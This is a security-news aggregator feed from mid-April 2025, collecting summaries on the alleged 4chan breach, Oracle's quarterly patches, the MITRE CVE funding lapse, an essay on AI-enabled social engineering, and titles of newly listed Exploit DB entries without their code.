4Chan Outage Sparks Cyberattack Rumors and Data Leak ConcernsOn April 14, 2025, 4Chan, the infamous anonymous image board, suffered an unexplained outage that left users frustrated and speculating about the cause. While the exact reason for the downtime remains uncertain, some users have suggested that a cyberattack or hacking incident could be responsible. According to DownDetector, a service that monitors website disruptions, a surge in user reports highlighted the problems with 4Chan. The issues were largely related to the website itself (72%), server connections (24%), and posting (4%). These reports spiked around 10 p.m. on April 14 and continued into the next day, with many users complaining that 4Chan was intermittently down for hours. 4Chan Hacking and Leaked Data Raise Concerns [Image: Downdetector showing outage data for 4Chan (Source: Downdetector)] As the outage continued, several screenshots allegedly showing 4Chan's backend surfaced on social media. These images appeared to display source code, templates for banning users, and a list of moderators and "janitors", users with limited administrative rights. The leaked data even included personal information like email addresses tied to 4Chan moderators, sparking further suspicion that the site had been hacked. These leaks appeared to coincide with the downtime, leading to increased speculation about a potential cyberattack on 4Chan. 4Chan's Controversial History with Cyberattacks 4Chan has long been associated with controversy and cyberattacks. The platform, which offers complete anonymity for users to post images and text, has repeatedly been the subject of boycotts, both from users and advertisers, as well as accusations that it hosts hate speech and illegal content. It has even been linked to inspiring mass shootings and other violent events.
Additionally, users on 4Chan have been involved in planning cyberattacks, including Distributed Denial-of-Service (DDoS) campaigns. On top of that, 4Chan has been home to the propagation of conspiracy theories, some of which have led to real-world consequences, such as the January 6 insurrection at the U.S. Capitol. Given its reputation, the recent downtime and the potential cyberattack on 4Chan have fueled further rumors about the platform's vulnerability. Some users have speculated that the site was breached, while others believe it could be a result of long-standing software vulnerabilities that 4Chan has yet to address. Alleged Hack and Doxxing The rumors surrounding the potential cyberattack gained traction after a previously banned 4Chan board briefly reappeared online, followed by a defacing message that read, "U GOT HACKED XD." Shortly thereafter, an online account on a rival forum, Soyjak.party, posted screenshots allegedly revealing parts of 4Chan's backend systems, including usernames and email addresses of 4Chan's administrators and moderators. These leaks quickly escalated into a wave of doxxing, in which users shared personal details of the 4Chan staff, including photos and other private information. Though the validity of these claims remains unclear, TechCrunch reported that one 4Chan moderator believed the leak and cyberattack were genuine. Despite multiple attempts, WIRED could not reach 4Chan for an official statement, further deepening the uncertainty surrounding the incident. Conclusion The recent alleged cyberattack on 4Chan highlights the platform's ongoing struggles with outdated software, security vulnerabilities, and its controversial reputation. Despite previous reassurances from the site's founder, Christopher Poole, regarding security improvements, it appears that 4Chan's legacy of hosting questionable content and attracting extremist users has left it susceptible to breaches.
Over the years, the platform's transformation from a niche space for anime fans to a hub for more nefarious activities has only deepened its notoriety. While the exact cause of the recent attack remains unclear, it is evident that 4Chan continues to face security challenges, not just in terms of securing its infrastructure but also in managing its reputation.
by The Cyber Express
2025-04-16 10:00:30
Sophos Annual Threat Report appendix: Most frequently encountered malware and abused softwareThese are the tools of the trade Sophos detected in use by cybercriminals over 2024
by Sophos News
2025-04-16 10:00:22
The Sophos Annual Threat Report: Cybercrime on Main Street 2025Ransomware remains the biggest threat, but old and misconfigured network devices are making it too easy
by Sophos News
2025-04-16 10:00:15
Streamlining detection engineering in security operation centersA proper detection engineering program can help improve SOC operations. In this article we'll discuss potential SOC issues, the necessary components of a detection engineering program and some useful metrics for evaluating its efficiency.
by Securelist
2025-04-16 09:57:00
Ensuring robust security and quantum readiness in healthcareIn healthcare, safeguarding sensitive data and ensuring device authentication is crucial. Effective Certificate Lifecycle Management (CLM) prevents breaches, supports compliance, and builds resilience against emerging threats like quantum computing. Sectigo’s digital identity solutions help healthcare organizations automate certificate management, enhance security, and prepare for a quantum-safe future.
by Sectigo
2025-04-16 09:21:29
Has AI changed malicious script obfuscation techniques?Obfuscation techniques have been changing since generative AI became widely available.
by ThreatDown
2025-04-16 09:21:08
Oracle April 2025 Critical Patch Update Addresses 171 CVEsOracle addresses 171 CVEs in its second quarterly update of 2025 with 378 patches, including 40 critical updates.
Background
On April 15, Oracle released its Critical Patch Update (CPU) for April 2025, the second quarterly update of the year. This CPU contains fixes for 171 unique CVEs in 378 security updates across 32 Oracle product families. Out of the 378 security updates published this quarter, 10.6% of patches were assigned a critical severity. Medium severity patches accounted for the bulk of security patches at 54.5%, followed by high severity patches at 32.3%. This quarter's update includes 40 critical patches across 15 CVEs.
Severity   Issues Patched   CVEs
Critical   40               15
High       122              52
Medium     206              98
Low        10               6
Total      378              171
Analysis
This quarter, the Oracle SQL Developer product family contained the highest number of patches at 103, accounting for 27.3% of the total patches, followed by Oracle Hyperion at 43 patches, which accounted for 11.4% of the total patches. A full breakdown of the patches for this quarter can be seen in the following table, which also includes a count of vulnerabilities that can be exploited over a network without authentication.
Oracle Product Family                     Number of Patches   Remote Exploit without Auth
Oracle SQL Developer                      103                 82
Oracle Hyperion                           43                  2
Oracle Secure Backup                      42                  35
Oracle Communications                     34                  22
Oracle E-Business Suite                   31                  26
Oracle Commerce                           16                  11
Oracle Enterprise Manager                 15                  11
Oracle JD Edwards                         11                  11
Oracle Hospitality Applications           8                   5
Oracle Database Server                    7                   3
Oracle TimesTen In-Memory Database        7                   6
Oracle REST Data Services                 6                   5
Oracle Analytics                          6                   5
Oracle Essbase                            4                   2
Oracle Communications Applications        4                   4
Oracle Insurance Applications             4                   1
Oracle MySQL                              4                   2
Oracle Policy Automation                  4                   4
Oracle Construction and Engineering       3                   2
Oracle Financial Services Applications    3                   2
Oracle Food and Beverage Applications     3                   2
Oracle Java SE                            3                   3
Oracle PeopleSoft                         3                   2
Oracle Supply Chain                       3                   0
Oracle NoSQL Database                     2                   2
Oracle Retail Applications                2                   0
Oracle Siebel CRM                         2                   2
Oracle Application Express                1                   1
Oracle Autonomous Health Framework        1                   0
Oracle GoldenGate                         1                   1
Oracle Graph Server and Client            1                   0
Oracle Fusion Middleware                  1                   1
Solution
Customers are advised to apply all relevant patches in this quarter's CPU. Please refer to the April 2025 advisory for full details.
Identifying affected systems
A list of Tenable plugins to identify these vulnerabilities will appear here as they're released. This link uses a search filter to ensure that all matching plugin coverage will appear as it is released.
Get more information
Oracle Critical Patch Update Advisory - April 2025
Oracle April 2025 Critical Patch Update Risk Matrices
Oracle Advisory to CVE Map
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2025-04-16 09:05:00
Future-Proofing Data Pipelines for Training AI ModelsConventional wisdom is that AI developers are close to exhausting all the data available for model training. Here's why that isn't necessarily the case.
by ITPro Today
2025-04-16 09:00:00
How Linux Communities Are Driving AI InnovationLinux communities are at the heart of AI innovation, contributing to open source frameworks, optimizing hardware acceleration, and fostering global collaboration.
by ITPro Today
2025-04-16 08:55:55
Federal AI Policy Demands Gov't, Private-Sector Tech Leaders Embrace Responsible AIA new era of U.S. federal AI policy is shifting public service delivery from human-led agencies to commercially developed AI systems, raising urgent questions.
by ITPro Today
2025-04-16 08:35:41
Why Data Classification Isn’t Enough to Prevent Data LossIn a world of growing data volume and diversity, protecting and keeping track of your organization’s sensitive information is increasingly complex – particularly when 63% of breaches stem from malicious insiders or human error. This blog explores how security teams can achieve visibility beyond the limits of data classification, without adding to the burden of data management.
by Darktrace
2025-04-16 08:32:57
Hack The Box partners with Purple Nexus to strengthen cybersecurity in India
by Hack The Box Blog
2025-04-16 07:40:15
AI-Driven Human Hacking is a New Frontier in CybersecurityBy Associate Professor Dr. Sheeba Armoogum, University of Mauritius In 2025, the paradigms of human hacking are undergoing a substantial transformation due to the influence of artificial intelligence (AI). While traditional social engineering tactics exploit the psychological vulnerabilities inherent in individuals, AI-driven human hacking introduces a markedly more sophisticated methodology that not only manipulates human behavior but also automates and scales this manipulation to previously unimaginable extents. AI transcends simple replication of human behavior; it adapts to it, assimilates knowledge from it, and tailors its attacks to each individual in real-time, thereby rendering traditional social engineering techniques obsolete in terms of efficiency and effectiveness. The manipulation of individuals through AI goes beyond merely imitating authoritative figures or simply exploiting trust. It uses advanced AI capabilities, such as machine learning, natural language processing, and complex data analytics, to mislead, control, and influence human behavior. The rise of AI-enhanced attacks signifies a significant evolution in the strategies used by cybercriminals to exploit human vulnerabilities, thus presenting a considerable challenge to traditional cybersecurity measures that depend on human intuition and behavioral patterns. The Mechanism of AI-Driven Human Hacking Fundamentally, AI-driven human manipulation uses machine learning algorithms to analyze extensive datasets, identify patterns, and predict human behavior with exceptional precision. These systems do not rely exclusively on pre-established scripts or anticipated psychological triggers; instead, they perpetually adapt, learn, and evolve, which substantially enhances their resistance to detection and countermeasures. 
AI is transforming the dynamics of human hacking by: Hyper-Personalized Manipulation: Traditional social engineering tactics often rely on broad approaches, such as phishing emails or misleading phone calls, which exploit common psychological tendencies like trust and fear. However, the rise of AI significantly enhances the capability to personalize these tactics to extraordinary degrees. By utilizing data mining techniques, machine learning algorithms can analyze an individual's online activities, preferences, social media interactions, and professional histories, crafting messages or actions that appear remarkably relevant to that person. This advanced hyper-personalization creates a strong sense of authenticity, making the attack nearly indistinguishable from a legitimate request or interaction. AI systems can collect data from social media to determine a person's hobbies, job titles, recent activities, and personal connections. With this information, cybercriminals can create highly personalized phishing emails that correspond with the individual's circumstances, such as a message from a manager about a recently discussed project or an alert from a service provider featuring a customized offer based on recent purchases. As a result, these communications appear both credible and urgent, significantly increasing the likelihood that the scam will deceive the target. Automated Conversations and Behavioral Mimicry: AI has advanced to engage in dynamic and continuous dialogues, closely emulating human behavior with remarkable precision. By analyzing patterns in written text or spoken language, AI models can replicate an individual's writing style, tone, and emotional cues including urgency, empathy, and informality. This advancement enables cybercriminals to exploit chatbots or voice assistants that can conduct conversations that appear both natural and credible.
In voice phishing, commonly referred to as "vishing", or AI-generated voice deepfakes, AI algorithms analyze extensive audio recordings of an individual's voice, resulting in remarkably accurate replication. Attackers can then impersonate trusted individuals, such as corporate executives or family members, using this synthesized voice to request sensitive information or execute financial transactions. These AI-driven interactions can be indistinguishable from genuine human communication, presenting an unprecedented challenge to traditional verification methods. Predictive Human Behavior Modeling: Machine learning algorithms utilize both static datasets and dynamic, real-time information. By analyzing individuals' actions and responses during interactions, AI systems can anticipate the likely behaviors of subjects and adapt their approaches accordingly. This predictive capability enables attackers to manipulate the trajectory of conversations or interactions based on the emotional or cognitive states of those involved. For example, suppose an attacker recognizes that an individual tends to respond positively to feelings of urgency or fear. In that case, they can continuously adjust the content of a message or the timing of a phone call to align with the victim's emotional state. AI can even analyze social media posts, online activities, and past conversations to identify the most advantageous moment to act, either during a particularly stressful time in the victim's life or when they are more likely to feel distracted or vulnerable. Exploiting Cognitive Biases on a Massive Scale: AI's true capabilities in influencing human behavior are rooted in its ability to exploit cognitive biases, those automatic, unconscious mental shortcuts individuals use in their decision-making processes.
Whether it involves the tendency to trust authority figures, the intrinsic need to reciprocate favors, or the inclination to avoid cognitive dissonance, AI systems can identify and amplify these biases in real time. In a more advanced scenario, attacks driven by AI can engage in “nudging,” a concept that originates from behavioral economics. This approach involves implementing subtle yet significant modifications in the presentation of information, which can influence decision-making processes without the individual being consciously aware of such manipulation. For example, an AI system could formulate a communication that instils a sense of urgency, as exemplified by the statement, “Only 10 slots remain!” This tactic can evoke the recipient's concern regarding potential loss, commonly referred to as the Fear Of Missing Out (FOMO), thereby compelling them to act impulsively without adequate consideration of the consequences. The Implications of Deepfake Technology and Psychological Manipulation: AI-driven deepfake technologies represent one of the most concerning advancements in human manipulation. Utilizing sophisticated deep learning methodologies, AI systems can produce highly realistic video and audio representations of individuals, thereby enabling cybercriminals to impersonate trustworthy figures with alarming authenticity. Deepfake technology is particularly adept at circumventing conventional methods of identity verification, as it exploits the inherent trust individuals place in visual and auditory stimuli. Consider a scenario in which a cybercriminal uses deepfake technology to impersonate a high-ranking company official, sending an employee a message that appears to come directly from the Chief Executive Officer. This deepfake may direct the employee to facilitate the transfer of funds or to grant access to sensitive company information.
Given the seemingly genuine nature of the message, the recipient is considerably more inclined to comply, particularly if they have an inherent trust in the individual who appears to be issuing the request. Scalable Attacks: One of the most alarming aspects of AI in the context of human hacking is its capacity for scalability. Traditional social engineering attacks require a significant amount of manual effort to craft individual messages, initiate phone calls, or conduct research on each victim. In contrast, AI has the potential to automate and enhance these activities. By utilizing machine learning algorithms, AI systems can perform thousands, or even millions, of personalized attacks concurrently, effectively targeting individuals across a diverse range of platforms and communication channels, including electronic mail, social media, and voice communication. The substantial magnitude of these AI-driven attacks significantly amplifies the threat. A single attack has the capacity to target a wide range of victims with minimal effort, and the speed at which AI can adapt and enhance its tactics makes it challenging for victims to identify and react to the attack in time. Ethical Implications of AI-Driven Human Hacking The emergence of AI-driven human manipulation prompts significant ethical considerations. While traditional social engineering techniques depend on deception and manipulation, AI introduces a new dimension of complexity and moral ambiguity. The following are some principal ethical concerns: Invasion of Privacy: AI-driven techniques for human manipulation frequently involve the acquisition of extensive personal data from both public and private sources. This situation prompts significant concerns regarding consent, privacy, and the ethical application of personal information. 
Through the utilization of AI to gather and analyze personal data, attackers can infringe upon an individual's privacy on an unprecedented scale, often without their knowledge or authorization. Psychological Manipulation: AI can exert influence over emotions and decision-making processes in ways that are both subtle and powerful. By predicting the responses of individuals to various stimuli, AI systems can guide human behavior without conscious awareness. This situation engenders significant concerns regarding the ethical implications of using AI to exploit human vulnerabilities for harmful purposes. Accountability: As AI becomes more involved in human hacking, the issue of accountability becomes increasingly complex. Who bears the responsibility when an AI system is exploited for malicious purposes? Is it the developers of the AI, the users, or the system itself? As AI systems gain more autonomy, determining liability in cases of AI-driven human hacking could present a considerable legal challenge. Security versus Privacy: An ongoing debate exists regarding the balance between enhancing security measures and safeguarding privacy rights. Techniques associated with AI in human hacking exploit personal data, which can potentially lead to the erosion of privacy rights. However, AI's ability to strengthen security frameworks and identify vulnerabilities also makes it a valuable tool in cybersecurity. The ethical dilemma lies in using AI responsibly, ensuring it enhances security without compromising individual privacy rights. AI-driven human hacking represents a transformative era in the persistent conflict between cybersecurity and cybercrime. By employing advanced technologies, including machine learning, predictive modeling, and the generation of deepfake content, attackers are capable of manipulating individuals with unprecedented scale and precision.
As these threats continue to evolve, it is essential for our understanding of cybersecurity defenses to progress accordingly. We must move beyond traditional tactics and embrace innovative, AI-driven solutions to effectively counter these sophisticated assaults. Simultaneously, it is crucial to address the ethical implications of AI in human hacking, ensuring that privacy, accountability, and human dignity remain paramount in our cybersecurity strategies.
by The Cyber Express
2025-04-16 06:00:00
A Dark Reading Panel - "The Promise and Perils of AI: Navigating Emerging Cyber Threats"This video showcases leading voices in cybersecurity examining how AI is simultaneously transforming cyber defense and supercharging attacker capabilities. Together, they explored how GenAI is reshaping the threat landscape and what security leaders must do to adapt.
by Bishop Fox
2025-04-16 04:08:00
AI vs Human: CTF results show AI agents can rival top hackersLearn how companies test, train, and benchmark cybersecurity AI agents with customized CTF competitions.
by Hack The Box Blog
2025-04-16 04:00:00
Snyk’s Statement on the MITRE CVEs Program Funding UpdateSnyk addresses the recent MITRE CVE funding news, detailing our independent vulnerability data capabilities & commitment to cybersecurity resilience.
by Snyk
2025-04-16 03:59:18
Funding Expires for Key Cyber Vulnerability DatabaseA critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program -- which is traditionally funded each year by the Department of Homeland Security -- expires on April 16.
by Krebs on Security
2025-04-16 01:23:02
The best VPN routers of 2025Setting up a VPN on your router can give you full coverage for all your devices at home. We've found the best routers that support VPN installation or include pre-installed VPN solutions.
by ZDNET Security
2025-04-16 01:03:49
The best free VPNs of 2025: Expert testedIf you are in need of a way to improve your online privacy, consider using a VPN. We tested the best free VPNs which offer solid services without invading your privacy or selling your data.
by ZDNET Security
2025-04-16 00:00:00
[webapps] WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
by Exploit DB
2025-04-16 00:00:00
[webapps] Smart Manager 8.27.0 - Post-Authenticated SQL Injection
by Exploit DB
2025-04-16 00:00:00
[remote] Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)
by Exploit DB
2025-04-16 00:00:00
[webapps] KodExplorer 4.52 - Open Redirect
by Exploit DB
2025-04-16 00:00:00
[local] ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
by Exploit DB
2025-04-16 00:00:00
[webapps] Car Rental Project 1.0 - Remote Code Execution
by Exploit DB
2025-04-16 00:00:00
[local] Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account
by Exploit DB
2025-04-16 00:00:00
[webapps] Ethercreative Logs 3.0.3 - Path Traversal
by Exploit DB
2025-04-16 00:00:00
[webapps] FLIR AX8 1.46.16 - Remote Command Injection
by Exploit DB
2025-04-16 00:00:00
[remote] Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
by Exploit DB
2025-04-16 00:00:00
[webapps] Garage Management System 1.0 (categoriesName) - Stored XSS
by Exploit DB
2025-04-16 00:00:00
[remote] WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
by Exploit DB
2025-04-16 00:00:00
[webapps] ProConf 6.0 - Insecure Direct Object Reference (IDOR)
by Exploit DB
2025-04-16 00:00:00
[webapps] phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames
by Exploit DB
2025-04-16 00:00:00
[hardware] ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS
by Exploit DB
2025-04-16 00:00:00
[hardware] ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS
by Exploit DB
2025-04-16 00:00:00
[hardware] ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution
by Exploit DB
2025-04-16 00:00:00
[hardware] ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)
by Exploit DB
2025-04-16 00:00:00
[webapps] Zabbix 7.0.0 - SQL Injection
by Exploit DB
2025-04-16 00:00:00
[webapps] NagVis 1.9.33 - Arbitrary File Read
by Exploit DB
2025-04-16 00:00:00
[webapps] Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
by Exploit DB
2025-04-16 00:00:00
[remote] Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)
by Exploit DB
2025-04-16 00:00:00
[webapps] phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
by Exploit DB
2025-04-16 00:00:00
Who Touched My GCP Project? Understanding the Principal Part in Cloud Audit Logs – Part 2This second part of the blog series continues the path to understanding principals and identities in Google Cloud Platform (GCP) Audit Logs. Part one introduced core concepts around GCP logging, the different identity types, service accounts, authentication methods, and impersonation.
by Mitiga
2025-04-16 00:00:00
Introducing the refreshed Recorded Future brandLearn how Recorded Future's brand refresh, powered by AI and actionable threat intelligence, helps teams evolve with the next generation of cybersecurity.
by Recorded Future
2025-04-16 00:00:00
TrustedSec Achieves CREST CertificationTrustedSec has achieved CREST Certification for penetration testing, a globally recognized standard that verifies an organization's ability to conduct high-quality, rigorous, and ethical cybersecurity services.
by TrustedSec
2025-04-15 23:00:00
Why I joined Cloudflare: to build world-class partnerships in EMEAThe EMEA region is a patchwork of diverse markets, industries, and regulatory environments, and it demands a partner-centric approach. That’s why I joined Cloudflare as VP of EMEA Partnerships.
by Cloudflare
2025-04-15 22:36:04
“Follow me” to this fake crypto exchange to claim $500Follow me for lucky prizes scams are old fake crypto exchange scams in a new jacket and on a different platform
by Malwarebytes Labs
2025-04-15 22:06:12
Accounting Firms Can't Skimp on CybersecurityCybercriminals capitalize on tax preparation stress, technology sprawl, and lax communications. Accounting teams can't afford to treat cybersecurity as an afterthought.
by Dark Reading
2025-04-15 22:00:00
CVE-2025-21299 and CVE-2025-29809: Unguarding Microsoft Credential GuardLearn more about the January 2025 Patch Tuesday that addresses a critical vulnerability where Kerberos canonicalization flaws allow attackers to bypass Virtualization Based Security and extract protected TGTs from Windows systems.
by NetSPI
2025-04-15 21:27:40
Here’s What Happened to Those SignalGate MessagesA lawsuit over the Trump administration’s infamous Houthi Signal group chat has revealed what steps departments took to preserve the messages—and how little they actually saved.
by WIRED Security News
2025-04-15 21:18:45
MITRE CVE Program Funding Extended For One YearMITRE’s CVE program has been an important pillar in cybersecurity for over two decades. While CISA secured funding on April 16 to extend the program for the next year, the lack of clarity surrounding its long-term future creates great uncertainty about how newly discovered vulnerabilities will be cataloged.
Updated Apr 16, 2025: The Cybersecurity and Infrastructure Security Agency (CISA) has stepped in to secure funding for the next year and ensure there will be no lapse in critical CVE services. Additionally, a coalition of CVE Board members has launched the CVE Foundation, a non-profit organization intended to maintain the stability and independence of the CVE program.
Background
On April 15, reports circulated that the contract for funding the Common Vulnerabilities and Exposures (CVE) program, along with other related programs such as Common Weakness Enumeration (CWE), would expire on April 16. The letter below was sent to CVE Board Members and published on social media and other forums announcing the expiration of these programs:
The legitimacy of this letter and its contents was confirmed by cybersecurity journalist Brian Krebs in a post on Mastodon. Tenable has also independently confirmed the letter’s legitimacy.
CVE program importance
While flawed in some ways, the CVE program, which recently celebrated its 25th anniversary, has been an important pillar in cybersecurity for over two decades. It provides a common taxonomy for cybersecurity solutions and organizations to track vulnerabilities and exposures. Since its launch in 1999, the CVE program had published over 250,000 CVEs as of the end of 2024.
Risk to CVE program
With the report that funding for the CVE program is potentially set to expire on April 16, the biggest concern is that CVE Numbering Authorities (CNAs) will no longer be able to reserve and assign CVEs for newly discovered vulnerabilities. While CNAs typically try to reserve a block of CVEs, the lack of transparency surrounding the future of the CVE program creates uncertainty around newly discovered vulnerabilities. The historical CVE database will remain intact on GitHub following the expiration of the CVE program. However, MITRE’s CVE program also provides a centralized repository of CVEs from which many organizations fetch data, and this may disappear. The lack of this centralized repository will create difficulties going forward for tracking new and noteworthy vulnerabilities under a common identifier.
Tenable’s response to the potential expiration of the MITRE CVE program
Tenable is closely monitoring the situation surrounding the possible expiration of the CVE program funding. Last year, when we learned about NIST’s National Vulnerability Database (NVD) experiencing delays in its analysis efforts, we highlighted that Tenable Vulnerability Management products utilize a diverse range of sources for CVSS scoring and our customers experienced little to no impact. As a provider of vulnerability scanning technology, we are not dependent on the CVE program directly for our vulnerability coverage. We develop our vulnerability coverage against vendor advisories directly, and will continue to do so as long as vendors make those advisories available, whether they contain CVE identifiers or not. Tenable also provides its customers with a richly sourced and curated Vulnerability Intelligence feed that provides contextualized information for any given vulnerability, regardless of whether a CVE has been assigned. Tenable is a CNA, and we allocate CVEs for our vulnerability disclosures through our Tenable Research Advisories page. We have also reserved a large number of CVE designators for disclosures to ensure the cybersecurity community has a clear identity for future discovered vulnerabilities. As new developments surrounding the CVE program emerge, we will update this blog post accordingly.
Get more information
MITRE Warns CVE Program Faces Disruption Amid US Funding Uncertainty
by Tenable
2025-04-15 20:59:20
For security, Android phones will now auto-reboot after three daysThe update comes months after Apple pushed its own “inactivity reboot” feature.
by TechCrunch
2025-04-15 20:21:31
Max Severity Bug in Apache Roller Enabled Persistent AccessThe remediated flaw gave adversaries a way to maintain access to the app through password resets.
by Dark Reading
2025-04-15 20:11:11
With AI's Help, Bad Bots Are Taking Over the WebBad bots are becoming increasingly difficult to detect as they more easily mimic human behaviors and utilize evasion techniques, researchers say.
by Dark Reading
2025-04-15 20:03:33
CISO priorities in 2025 | Kaspersky official blogSix key areas for cost-effective development of a company's information security function in 2025, with a focus on budget optimization
by Kaspersky
2025-04-15 20:01:44
Critical Ivanti Flaw Actively Exploited to Deploy TRAILBLAZE and BRUSHFIRE MalwareContext Ivanti has disclosed a critical vulnerability, CVE-2025-22457 (CVSS 9.0), affecting multiple product lines including Connect Secure, Policy Secure, and ZTA Gateways. The flaw, a stack-based buffer overflow, allows unauthenticated remote attackers to execute arbitrary code, and has been actively exploited in the wild. Google’s Mandiant team identified threat activity tied to UNC5221, a China-nexus group, which...
by RH-ISAC
2025-04-15 20:01:22
AI-Powered Presentation Tool Leveraged in Phishing AttacksResearchers at Abnormal Security said threat actors are using a legitimate presentation and graphic design tool named "Gamma" in phishing attacks.
by Dark Reading
2025-04-15 19:36:00
Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell ToolThe China-linked threat actor known as UNC5174 has been attributed to a new campaign that leverages a variant of a known malware dubbed SNOWLIGHT and a new open-source tool called VShell to infect Linux systems. "Threat actors are increasingly using open source tools in their arsenals for cost-effectiveness and obfuscation to save money and, in this case, plausibly blend in with the pool of
by The Hacker News
2025-04-15 19:14:57
Suspected 4chan Hack Could Expose Longtime, Anonymous AdminsThough the exact details of the situation have not been confirmed, community infighting seems to have spilled out in a breach of the notorious image board.
by WIRED Security News
2025-04-15 19:14:00
Critical Apache Roller Vulnerability (CVSS 10.0) Enables Unauthorized Session PersistenceA critical security vulnerability has been disclosed in the Apache Roller open-source, Java-based blogging server software that could allow malicious actors to retain unauthorized access even after a password change. The flaw, assigned the CVE identifier CVE-2025-24859, carries a CVSS score of 10.0, indicating maximum severity. It affects all versions of Roller up to and including 6.1.4.
by The Hacker News
2025-04-15 18:55:00
Majority of Browser Extensions Can Access Sensitive Enterprise Data, New Report FindsEverybody knows browser extensions are embedded into nearly every user’s daily workflow, from spell checkers to GenAI tools. What most IT and security people don’t know is that browser extensions’ excessive permissions are a growing risk to organizations. LayerX today announced the release of the Enterprise Browser Extension Security Report 2025. This report is the first and only report to merge
by The Hacker News
2025-04-15 18:50:00
Malicious PyPI Package Targets MEXC Trading API to Steal Credentials and Redirect OrdersCybersecurity researchers have disclosed a malicious package uploaded to the Python Package Index (PyPI) repository that's designed to reroute trading orders placed on the MEXC cryptocurrency exchange to a malicious server and steal tokens. The package, ccxt-mexc-futures, purports to be an extension built on top of a popular Python library named ccxt (short for CryptoCurrency eXchange Trading),
by The Hacker News
2025-04-15 18:37:46
Hertz Falls Victim to Cleo Zero-Day AttacksCustomer data such as birth dates, credit card numbers, and driver's license information were stolen when threat actors exploited zero-day vulnerabilities in Cleo-managed file-transfer products.
by Dark Reading
2025-04-15 18:16:51
Swatting attacks explained: What you need to knowEarlier this year, 18-year-old Alan Filion was sentenced to four years in federal prison for ‘making interstate threats to injure others.’ Filion put himself in this position by conducting 375 ‘swatting’ attacks over the last 18 months.
by Barracuda
2025-04-15 17:05:15
9 Modern Ways You Can Use Bitcoin in 2025Cryptocurrency is slowly becoming a regular way to pay for something, with new uses popping up every day. Many people choose Bitcoin, among others, because it’s easy to use, quick, secure, private, and more affordable than traditional methods. 1. Gaming, Virtual Worlds, and Entertainment If you’re into gaming, Bitcoin is already part of the action, […] The post 9 Modern Ways You Can Use Bitcoin in 2025 appeared first on IT Security Guru.
by IT Security Guru
2025-04-15 16:54:21
Notorious image board 4chan hacked and internal data leakedThe infamous website was taken down and working intermittently, while hackers leaked alleged data such as moderators' email addresses and source code.
by TechCrunch
2025-04-15 16:45:00
Mitre warns over lapse in CVE coverageMitre, the operator of the world-renowned CVE repository, has warned of significant impacts to global cyber security standards, and increased risk from threat actors, as it emerges that its US government contract will lapse imminently.
by ComputerWeekly
2025-04-15 16:11:23
Wave of Wine-Inspired Phishing Attacks Targets EU DiplomatsRussia-backed APT29's latest campaign once again uses malicious invites to wine-tasting events as its lure, but this time targets a different set of vintages — errr, victims — and delivers a novel backdoor, GrapeLoader.
by Dark Reading
2025-04-15 15:57:54
Your Android phone is getting a new security secret weapon - how it worksThis new security feature from Google will make your Android phone more difficult to access if you haven't used it in a while.
by ZDNET Security
2025-04-15 15:03:55
UK Organizations Cite Phishing as the Most Disruptive Type of CyberattackPhishing was the most prevalent and disruptive type of attack experienced by UK organizations over the past twelve months, according to the British government’s Cyber Security Breaches Survey 2025.
by KnowBe4
2025-04-15 15:02:56
Sophos Firewall v21.5: NDR EssentialsHow to make the most of the new features in Sophos Firewall v21.5
by Sophos News
2025-04-15 14:50:21
Hertz data breach caused by CL0P ransomware attack on vendorCar rental giant Hertz suffered a data breach caused by a CL0P ransomware attack on file sharing vendor Cleo.
by Malwarebytes Labs
2025-04-15 14:40:00
Crypto Developers Targeted by Python Malware Disguised as Coding ChallengesThe North Korea-linked threat actor assessed to be behind the massive Bybit hack in February 2025 has been linked to a malicious campaign that targets developers to deliver new stealer malware under the guise of a coding assignment. The activity has been attributed by Palo Alto Networks Unit 42 to a hacking group it tracks as Slow Pisces, which is also known as Jade Sleet, PUKCHONG,
by The Hacker News
2025-04-15 14:00:00
China-Backed Threat Actor 'UNC5174' Using Open Source Tools in Stealthy AttacksSysdig researchers detailed an ongoing campaign from China-backed threat actor UNC5174, which is using open source hacking tools to stay under the radar.
by Dark Reading
2025-04-15 14:00:00
Are We Prioritizing the Wrong Security Metrics?True security isn't about meeting deadlines — it's about mitigating risk in a way that aligns with business objectives while protecting against real-world threats.
by Dark Reading
2025-04-15 13:45:00
UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShellAfter a year of operating under the radar, the Sysdig Threat Research Team (TRT) identified a new campaign from Chinese... The post UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell appeared first on Sysdig.
by Sysdig
2025-04-15 13:00:37
Renewed APT29 Phishing Campaign Against European DiplomatsHighlights Introduction Starting in January 2025, Check Point Research (CPR) has been tracking a wave of targeted phishing attacks aimed at European governments and diplomats. The Techniques, Tactics and Procedures (TTPs) observed in this campaign align with the WINELOADER campaigns, which were attributed to APT29, a Russia linked threat group. APT29, also commonly referred to as Midnight Blizzard […] The post Renewed APT29 Phishing Campaign Against European Diplomats appeared first on Check Point Research.
by Check Point Research
2025-04-15 13:00:00
CyberheistNews Vol 15 #15 [HEADS UP] North Korea Expands Its Fraudulent IT Worker Operations
by KnowBe4
2025-04-15 12:56:55
